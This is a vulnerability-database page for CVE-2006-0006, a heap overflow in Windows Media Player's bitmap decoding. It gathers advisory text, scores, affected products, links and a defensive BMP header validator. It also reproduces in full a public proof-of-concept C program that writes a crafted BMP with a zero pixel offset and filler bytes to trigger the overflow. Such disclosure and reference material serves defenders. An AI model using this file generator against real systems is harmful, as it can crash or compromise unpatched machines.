CVE-2006-0006
CVSS 9.3
Published: 2006-02-14 17:06:00
Revised: 2011-10-17 00:00:00
NMCOES

[Original] Heap-based buffer overflow in the bitmap processing routine in Microsoft Windows Media Player 7.1 on Windows 2000 SP4, Media Player 9 on Windows 2000 SP4 and XP SP1, and Media Player 10 on XP SP1 and SP2 allows remote attackers to execute arbitrary code via a crafted bitmap (.BMP) file that specifies a size of 0 but contains additional data.


[CNNVD] Microsoft Windows Media Player Malformed Bitmap File Handling Heap Overflow Vulnerability (CNNVD-200602-197)

        Microsoft Windows Media Player is a very popular media player.
        Microsoft Windows Media Player has a vulnerability in its handling of malformed bitmap files; an attacker could exploit it to execute arbitrary instructions on the user's machine. Windows Media Player can play bitmap-format files (such as .bmp files) and decodes them, but it does not correctly handle a bmp file that declares a size of 0. In that case WMP allocates a heap buffer of size 0 but copies data into it using the actual file length, so a bmp file that declares a size of 0 causes an overflow. An attacker could trick a user into opening a specially crafted bitmap file with Windows Media Player and thereby execute arbitrary instructions.
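As an added defensive example (not code from the page, eEye or Microsoft), the following C validator shows the header consistency checks a BMP decoder needs before it sizes and fills its buffer, so that a file declaring a size of 0 while carrying extra data is rejected instead of overflowing. The function names, the 24-bit-only scope and the two constructed inputs are assumptions for illustration, not the advisory's test file.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Added example (not code from the page, eEye or Microsoft). The described flaw
 * sized its heap allocation from a header field that can be 0 and then copied the
 * real file length; here every size is derived from the geometry and cross-checked. */
enum bmp_verdict { BMP_OK = 0, BMP_TOO_SHORT, BMP_BAD_MAGIC, BMP_BAD_OFFSET,
                   BMP_BAD_GEOMETRY, BMP_SIZE_MISMATCH };
static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | p[1] << 8); }
static uint32_t rd32(const uint8_t *p) { return rd16(p) | (uint32_t)rd16(p + 2) << 16; }
static void wr32(uint8_t *p, uint32_t v) { for (int i = 0; i < 4; i++) p[i] = (uint8_t)(v >> 8 * i); }
/* Validates an in-memory 24-bit uncompressed BMP (14-byte file header + 40-byte info
 * header). On BMP_OK, *pixel_bytes is the exact amount that is safe to allocate and copy. */
enum bmp_verdict bmp_check(const uint8_t *buf, size_t len, size_t *pixel_bytes)
{
    if (len < 54) return BMP_TOO_SHORT;
    if (rd16(buf) != 0x4D42) return BMP_BAD_MAGIC;                      /* "BM" */
    uint32_t bf_size = rd32(buf + 2), off = rd32(buf + 10), bi_size = rd32(buf + 14);
    int32_t width = (int32_t)rd32(buf + 18), height = (int32_t)rd32(buf + 22);
    uint16_t bpp = rd16(buf + 28); uint32_t compression = rd32(buf + 30), size_image = rd32(buf + 34);
    if (bi_size != 40 || off < 54 || off > len) return BMP_BAD_OFFSET;  /* 0 or inside the headers */
    if (bf_size != len) return BMP_SIZE_MISMATCH;                       /* declared vs. real length */
    if (width <= 0 || width > 0xFFFF || height == 0 || height > 0xFFFF || height < -0xFFFF ||
        bpp != 24 || compression != 0) return BMP_BAD_GEOMETRY;
    size_t rows = (size_t)(height < 0 ? -height : height);             /* negative height = top-down */
    size_t row = ((size_t)width * 3 + 3) & ~(size_t)3;                  /* rows padded to 4 bytes */
    size_t need = row * rows;                                           /* from geometry, not one field */
    if (need != len - off || (size_image != 0 && size_image != need)) return BMP_SIZE_MISMATCH;
    if (pixel_bytes) *pixel_bytes = need;
    return BMP_OK;
}
/* Constructed header writer: BM magic, 40-byte info header, 1 plane, 24 bpp, BI_RGB. */
void put_header(uint8_t *buf, uint32_t file_size, uint32_t off, int32_t w, int32_t h, uint32_t size_image)
{
    memset(buf, 0, 54);
    buf[0] = 'B'; buf[1] = 'M'; buf[26] = 1; buf[28] = 24;
    wr32(buf + 2, file_size); wr32(buf + 10, off); wr32(buf + 14, 40);
    wr32(buf + 18, (uint32_t)w); wr32(buf + 22, (uint32_t)h); wr32(buf + 34, size_image);
}
/* Constructed inputs: a well-formed 2x2 image (two 8-byte rows), or a file shaped like
 * the one described above: pixel offset 0 and 0x41 filler after the headers. */
enum bmp_verdict bmp_demo(int crafted, size_t *px)
{
    uint8_t f[54 + 64];
    size_t len = crafted ? sizeof f : 54 + 16;
    memset(f, crafted ? 0x41 : 0, sizeof f);
    put_header(f, (uint32_t)len, crafted ? 0 : 54, 2, 2, crafted ? 0 : 16);
    return bmp_check(f, len, px);
}
```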

- CVSS (Base Score)

CVSS Score: 9.3 [Critical (HIGH)]
Confidentiality Impact: COMPLETE [Complete information disclosure; all system files exposed]
Integrity Impact: COMPLETE [System integrity can be completely compromised]
Availability Impact: COMPLETE [May cause a complete system outage]
Attack Complexity: MEDIUM [Exploitation requires certain access conditions]
Attack Vector: NETWORK [The attacker does not need intranet or local access]
Authentication: NONE [No authentication is required to exploit the vulnerability]

- CWE (Weakness Category)

CWE-119 [Improper Restriction of Operations within the Bounds of a Memory Buffer]

- CPE (Affected Platforms and Products)

cpe:/a:microsoft:windows_media_player:10  Microsoft Windows Media Player 10
cpe:/o:microsoft:windows_xp::sp2:tablet_pc  Microsoft windows xp_sp2 tablet_pc
cpe:/o:microsoft:windows_2003_server:r2
cpe:/a:microsoft:windows_media_player:7.1  Microsoft windows_media_player 7.1
cpe:/o:microsoft:windows_me  Microsoft Windows ME
cpe:/o:microsoft:windows_98::gold  Microsoft windows 98_gold
cpe:/a:microsoft:windows_media_player:9  Microsoft Windows Media Player 9
cpe:/o:microsoft:windows_2000::sp4::fr
cpe:/o:microsoft:windows_2000::sp1  Microsoft windows 2000_sp1
cpe:/o:microsoft:windows_98se  Microsoft windows 98_se
cpe:/o:microsoft:windows_xp::sp1:tablet_pc  Microsoft windows xp_sp1 tablet_pc

- OVAL (Technical Details for Detection)

oval:org.mitre.oval:def:1661  Windows Media Player 9 Bitmap Remote Code Execution
oval:org.mitre.oval:def:1578  Windows Media Player 7.10 Bitmap Remote Code Execution
oval:org.mitre.oval:def:1256  Windows Media Player 8 Bitmap Remote Code Execution
oval:gov.nist.fdcc.patch:def:11532  MS06-005: Vulnerability in Windows Media Player Could Allow Remote Code Execution (911565)
oval:gov.nist.USGCB.patch:def:11532  MS06-005: Vulnerability in Windows Media Player Could Allow Remote Code Execution (911565)
*OVAL describes in detail how to detect this vulnerability; see the related OVAL definitions for more technical detail on detecting it.

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0006
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0006
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200602-197
(Official data source) CNNVD

- Other Links and Resources

http://www.us-cert.gov/cas/techalerts/TA06-045A.html
(VENDOR_ADVISORY)  CERT  TA06-045A
http://www.kb.cert.org/vuls/id/291396
(VENDOR_ADVISORY)  CERT-VN  VU#291396
http://www.securityfocus.com/bid/16633
(PATCH)  BID  16633
http://www.microsoft.com/technet/security/bulletin/ms06-005.mspx
(VENDOR_ADVISORY)  MS  MS06-005
http://www.eeye.com/html/research/advisories/AD20060214.html
(VENDOR_ADVISORY)  MISC  http://www.eeye.com/html/research/advisories/AD20060214.html
http://securitytracker.com/id?1015627
(PATCH)  SECTRACK  1015627
http://secunia.com/advisories/18835
(VENDOR_ADVISORY)  SECUNIA  18835
http://xforce.iss.net/xforce/xfdb/24488
(UNKNOWN)  XF  win-media-player-bmp-bo(24488)
http://www.vupen.com/english/advisories/2006/0574
(VENDOR_ADVISORY)  VUPEN  ADV-2006-0574
http://www.securityfocus.com/archive/1/archive/1/425158/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060215 Windows Media Player BMP Heap Overflow (MS06-005)
http://www.securityfocus.com/archive/1/archive/1/424983/100/0/threaded
(VENDOR_ADVISORY)  BUGTRAQ  20060214 [EEYEB-20051017] Windows Media Player BMP Heap Overflow
http://securityreason.com/securityalert/423
(UNKNOWN)  SREASON  423

- Vulnerability Information

Microsoft Windows Media Player Malformed Bitmap File Handling Heap Overflow Vulnerability
High risk  Buffer overflow
2006-02-14 00:00:00 2006-10-30 00:00:00
Remote

- Advisories and Patches

        The vendor has released an upgrade patch to fix this security issue; patch download links:
        http://www.microsoft.com/downloads/details.aspx?FamilyId=26A0B9E1-1242-4E55-B3D4-8377B83257C6
        http://www.microsoft.com/downloads/details.aspx?FamilyId=8F9EEF16-04F7-4DA8-A0EF-1797B52D0B4B
        http://www.microsoft.com/downloads/details.aspx?FamilyId=182735E1-9382-4F2E-A624-D2316A96B411

- Vulnerability Information (1500)

Windows Media Player 7.1 <= 10 BMP Heap Overflow PoC (MS06-005) (EDBID:1500)
windows dos
2006-02-15 Verified
0 ATmaCA
N/A
/*
* For Remote Exploration (hint):
* http://www.spyinstructors.com/atmaca/research/wmp_remote_poc.asx
*/

/*
*
* Windows Media Player BMP Heap Overflow (MS06-005)
* Bug discovered by eEye - http://www.eeye.com/html/research/advisories/AD20060214.html
* Exploit coded by ATmaCA
* Web: http://www.spyinstructors.com  && http://www.atmacasoft.com
* E-Mail: atmaca@icqmail.com
* Credit to Kozan
*
*/

/*
*
* Systems Affected:
* Microsoft Windows Media Player 7.1 through 10
*
* Windows NT 4.0
* Windows 98 / ME
* Windows 2000 SP4
* Windows XP SP1 / SP2
* Windows 2003
*
*
*/

/*
*
* In this vulnerability, the payload is loaded to different places in memory each time,
* but sometimes it is very easy to call our shellcode:
* http://www.spyinstructors.com/atmaca/research/wmp.JPG
* but sometimes not =) because of that, no shell this time
*
*/

/*
*
* Microsoft has released a patch for this vulnerability.
* The patch is available at:
* http://www.microsoft.com/technet/security/bulletin/ms06-005.mspx
*
*/

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>   // malloc, free, exit
#include <string.h>   // memset, memcpy

#define BITMAP_FILE_SIZE        0xA8D2
#define BITMAP_FILE_NAME        "crafted.bmp"

#pragma pack( push )
#pragma pack( 1 )

// bitmap file format - http://atlc.sourceforge.net/bmp.html
// File information header provides general information about the file
typedef struct _BitmapFileHeader {
  WORD    bfType;         // "BM" magic
  DWORD   bfSize;         // total file size in bytes
  WORD    bfReserved1;
  WORD    bfReserved2;
  DWORD   bfOffBits;      // offset from the start of the file to the pixel data
} BMPFHEADER;

// Bitmap information header provides information specific to the image data
typedef struct _BitmapInfoHeader{
  DWORD  biSize;          // size of this header (40 bytes)
  LONG   biWidth;
  LONG   biHeight;
  WORD   biPlanes;
  WORD   biBitCount;      // bits per pixel
  DWORD  biCompression;
  DWORD  biSizeImage;     // size of the pixel data in bytes
  LONG   biXPelsPerMeter;
  LONG   biYPelsPerMeter;
  DWORD  biClrUsed;
  DWORD  biClrImportant;
} BMPIHEADER;

#pragma pack( pop )

int main(void)
{
        FILE *File;
        BMPFHEADER *bmp_fheader;
        BMPIHEADER *bmp_iheader;
        char *pszBuffer;

        printf("\nWindows Media Player BMP Heap Overflow (MS06-005)");
        printf("\nBug discovered by eEye");
        printf("\nExploit coded by ATmaCA");
        printf("\nWeb: http://www.spyinstructors.com  && http://www.atmacasoft.com");
        printf("\nE-Mail: atmaca@icqmail.com");
        printf("\nCredit to Kozan");


        if ( (File = fopen(BITMAP_FILE_NAME,"w+b")) == NULL ) {
                printf("\n [E:] fopen()");
                exit(1);
        }

        bmp_fheader=(BMPFHEADER*)malloc(sizeof(BMPFHEADER));
        bmp_iheader=(BMPIHEADER*)malloc(sizeof(BMPIHEADER));
        pszBuffer = (char*)malloc(BITMAP_FILE_SIZE);
        if ( bmp_fheader == NULL || bmp_iheader == NULL || pszBuffer == NULL ) {
                printf("\n [E:] malloc()");
                fclose(File);
                exit(1);
        }

        // fill the whole file with 0x41; the two headers are copied over the start below
        memset(pszBuffer,0x41,BITMAP_FILE_SIZE);

        bmp_fheader->bfType = 0x4D42; // "BM"
        bmp_fheader->bfSize = BITMAP_FILE_SIZE;
        bmp_fheader->bfReserved1 = 0x00;
        bmp_fheader->bfReserved2 = 0x00;

        // eEye - MAGIC
        // Antiviruses will get the signature from here!!!
        bmp_fheader->bfOffBits = 0x00; //( sizeof(BMPFHEADER) + sizeof(BMPIHEADER) );

        bmp_iheader->biSize = 0x28;
        bmp_iheader->biWidth = 0x91;
        bmp_iheader->biHeight = 0x63;
        bmp_iheader->biPlanes = 0x01;
        bmp_iheader->biBitCount = 0x18;
        bmp_iheader->biCompression = 0x00;
        bmp_iheader->biSizeImage = 0xA89C;
        bmp_iheader->biXPelsPerMeter = 0x00;
        bmp_iheader->biYPelsPerMeter = 0x00;
        bmp_iheader->biClrUsed = 0x00;
        bmp_iheader->biClrImportant = 0x00;

        memcpy(pszBuffer,bmp_fheader,sizeof(BMPFHEADER));
        memcpy(pszBuffer+sizeof(BMPFHEADER),bmp_iheader,sizeof(BMPIHEADER));

        fwrite(pszBuffer, BITMAP_FILE_SIZE-1, 1,File);
        fwrite("\x00", 1,1, File); //Terminator

        fclose(File);
        free(pszBuffer);
        free(bmp_iheader);
        free(bmp_fheader);
        printf("\n\n"  BITMAP_FILE_NAME" has been created in the current directory.\n");

        return 0;
}

// milw0rm.com [2006-02-15]

- Vulnerability Information

23131
Microsoft Windows Media Player Bitmap File Processing Overflow
Local / Remote Input Manipulation
Loss of Integrity Patch / RCS, Upgrade
Exploit Public Vendor Verified

- Vulnerability Description

- Timeline

2006-02-14 Unknown
2006-02-15 2006-02-14

- Solution

Products

Unknown or Incomplete

- References

- Vulnerability Author

Unknown or Incomplete

- Vulnerability Information

Microsoft Windows Media Player Bitmap Handling Buffer Overflow Vulnerability
Class: Boundary Condition Error  Bugtraq ID: 16633
Remote: Yes  Local: No
Published: 2006-02-14 12:00:00  Updated: 2006-04-12 04:47:00
Discovered by Marc Maiffret of eEye.

- Affected Program Versions

Nortel Networks Symposium TAPI Service Provider
Nortel Networks Symposium Agent
Nortel Networks MCS 5200 3.0
Nortel Networks MCS 5100 3.0
Nortel Networks IP softphone 2050
Nortel Networks IP Address Domain Manager
Nortel Networks Enterprise Network Management System
Nortel Networks Contact Center Web Client
Nortel Networks Contact Center Multimedia
Nortel Networks Contact Center Manager
Nortel Networks Contact Center Express
Nortel Networks Contact Center
Nortel Networks CallPilot 3.0
Nortel Networks CallPilot 1001rp
Microsoft Windows Media Player 9.0
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Web Edition
Microsoft Windows Media Player 8.0
Microsoft Windows Media Player 7.1
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
Microsoft Windows Media Player 10.0
Microsoft Windows ME
Microsoft Windows 98SE
Microsoft Windows 98

- Vulnerability Discussion

Microsoft Windows Media Player is prone to a remote buffer-overflow vulnerability.

The vulnerability arises when the application handles a skin file containing a specially crafted bitmap image. This issue can also be triggered by just supplying a malicious bitmap to the application. Note, however, that Windows Media Player is not the default handler for bitmap files.

A successful attack can corrupt process memory and result in arbitrary code execution. This may facilitate a remote compromise in the context of the vulnerable user.

- Exploit

Proof-of-concept code has been released for this vulnerability:

http://www.securityfocus.com/data/vulnerabilities/exploits/20060215.wmp-ms06-005.cpp

- Solution

Microsoft has released updates to address this vulnerability in supported versions of the Windows operating system.

Microsoft Windows Media Player 10.0
Microsoft Windows Media Player 7.1
Microsoft Windows Media Player 8.0
Microsoft Windows Media Player 9.0

- References

About the SCAP Chinese Community

The SCAP Chinese Community is the first open Chinese-language community in China devoted to SCAP. For more information, see [About this site].

Copyright Notice

CVE/CWE/OVAL are registered trademarks of the MITRE Corporation; their official data sources are hosted on MITRE's websites.